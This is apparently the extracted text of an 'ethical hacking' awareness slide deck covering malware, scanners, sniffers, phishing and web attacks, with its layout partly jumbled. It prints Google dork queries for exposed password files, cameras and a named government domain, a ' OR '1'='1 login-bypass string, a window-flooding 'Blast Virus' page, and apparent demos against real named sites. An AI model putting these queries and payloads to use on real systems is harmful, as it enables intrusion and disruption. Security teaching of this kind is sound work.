INFORMATION SECURITY &

ETHICAL HACKING

How secure are you?

 Agenda
Networks Exposure to Security Threats
What is Information Security And Ethical Hacking
Two Major Aspects - Desktop & Internet Security
Live Demonstrations of Attacks
 Networks Exposures To Threats

By the end of 2013, 95% of enterprises will be infected with

undetected, financially motivated, targeted threats that evaded their
traditional perimeter and host defenses- By Gartner, Top Ten Key
Predictions, 2012

security predictions in 2012

 Two Major Aspects Of Security

Desktop and internet security

Cracking Login Password

Cracking Tools :
The Passwords are stored in SAM file ERD Commander
PH Crack
and many more

SAM = Security Account Manager

 OR we can Change the Password

C:\> net user username password

You need the admin rights !

But you can change Passwords of Other Admin Users !

Thats easy but admin rights hm

Virus & Worms Trojan Horse

Keylogger

The three major threats to computer world!!

 Symptoms
Worms
The system might start These generally dont
hanging. perform any malicious
activity.
Softwares and applications
often starts crashing They reside in the
system and make copies
System may become of itself
unpredictable.
These eat up the system
In some extreme cases resources
OS may also crash.

Today almost 87% of all viruses/worms are spread through the Internet.
 Lets
Code a
Virus ! !
Is it difficult ?
 Trojan Horse

A Trojan is an infection that

steals information.

It then sends the information to a

specified location over the internet.

It makes the computer prone to

hackers by making Backdoors.

Attacker Victim

Trojan is a fatal gift !

 KEYLOGGER

They log all the keys that

you type.

This runs in the

background and is totally
invisible.

Trojans often have the

keyloggers with them and
they mail the log to their
masters.

Watch your key strokes!

 Windows Registry
All initialization and
configuration information used
by windows are stored in the
registry.

Know how change in registries effects your system!

 Network Scanners
Network Scanners used to
find all the live systems present
in the network with the
Information about IP Address,
Port Number, Services running
on that ports, Vulnerabilities,
installed applications etc.

Some Tools:-

Angry IP Scanner
GFI LAN Guard
Look At LAN

Finding live Hosts!

 Sniffers

Sniffers used to Capture the data

packet from the network by applying
some Poisoning such as ARP
Poisoning.

Some Tools:-

Cain and abel

Ettercap

hmmmmmmmmmm!
 Cryptography

Art of Secret writing to convert plaintext(Readable format) into cipher text(Non-

Readable format) by using some algorithms with the help of a Key.

Encrypters!
 Stagenography

Art of Secret writing to Hide one file behind the other file. Example a text message
can be bind behind the image or video file.

Hiding..
 How Do I Protect My Data ?
Use Antiviruses with
Updated Signatures

Use Firewalls

Do not open Untrusted

executables

Use Cryptography
Techniques

I will mess it up!

World Wide Web
 Web Developers Nightmare

Remote System
Scanning
Google
Hacking

DNS Spoofing
SQL Injection

DOS Attack

Website Exploits
 Google Cracking
Using Google

Google is more than just a

Search Engine.
Special keywords can perform
better Searches.

<Google Commands>
site, intitle, filetype, allintitle, inurl

Google crawls the web !

 Database Cracking

Hmmmmmmmmmmm..
 Advance Googling

Filetype:xls hry.nic.in
 Password Cracking

Intitle:index .of master.passwd

 Camera Cracking

Inurl:indexframe.shtml axis
Backend SQL string
Select * from table where user= " & TextBox1.Text & AND pass= '" & TextBox2.Text & ;

' OR '1'='1

String after SQL Injection

Select * from table where user= OR 1=1 AND pass= OR 1=1 ;

Lets see how is

this done!
We Know that is always True!
user= AND pass= ;

Lets see how a simple SQL injection works

Uptu vice chancellor desk.
Jetking Super Admin Section..
 Surfing Online
Browser
Hacking
Phishing

Fake Emails
Social Networking
Abuse

Dangers for Internet Users

 Browser Cracking
Use scripts links to run in Browser.
These scripts change the behavior of Browser.
Example:
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300;
y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function
A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';
DIS.left=Math.sin (R*x1+i*x2+x3)*x4+x5;
DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)

javascript:b=[]; a=document.images; for(wt=0; wt<a.length;

wt++){a[wt].style.position='relative'; b[b.length]=a[wt]}; j=0;
setInterval('j++; for(wt=0; wt<b.length;
wt++){b[wt].style.left=Math.sin((6.28/a.length)*wt+j/10)*10}; void(0)',1);
void(0);

Lets Do It.........
 Blast Virus
<html>
<body>
<script language="javascript">
while(1)
{
w1=window.open();
w1.document.write("<center><font color=red size=5>
blaaaast!!</font></center>");
}
</script>
</body>
</html>

Lets Do It.........
 Fake Emails
Sending Fake mails with Fake
headers
E-mails can be sent to anyone
from any Id
It is used also in Spamming

Lets Send a Fake

Email !

Its bush@georgebush.com ...

 How to Catch Fake Emailers
Analyze the headers
Use sites like
whatismyipaddress.com to trace the IP
address of fake mail

Go to Regional Internet Registries like

Apnic, Afrinic, etc.
Get the email of ISP of attacker &
lodge the complaint.

Catch me if u can
 Phishing Attack

E-mail: Theres a problem with

your Gmail account
Password sent

Password?

User thinks its Gmail.com

(But its Gmail.org)

Lets make a fake page

 Preventing Phishing
Read the URL carefully

Keep a suspicious eye over

info demanding E-mails.

Anti-phishing Tools can be

effective

Use your Brain

Thank You
For any query and assistance,
Kindly contact:

Appin Technology lab

This is just a Trailer movie is about to Begin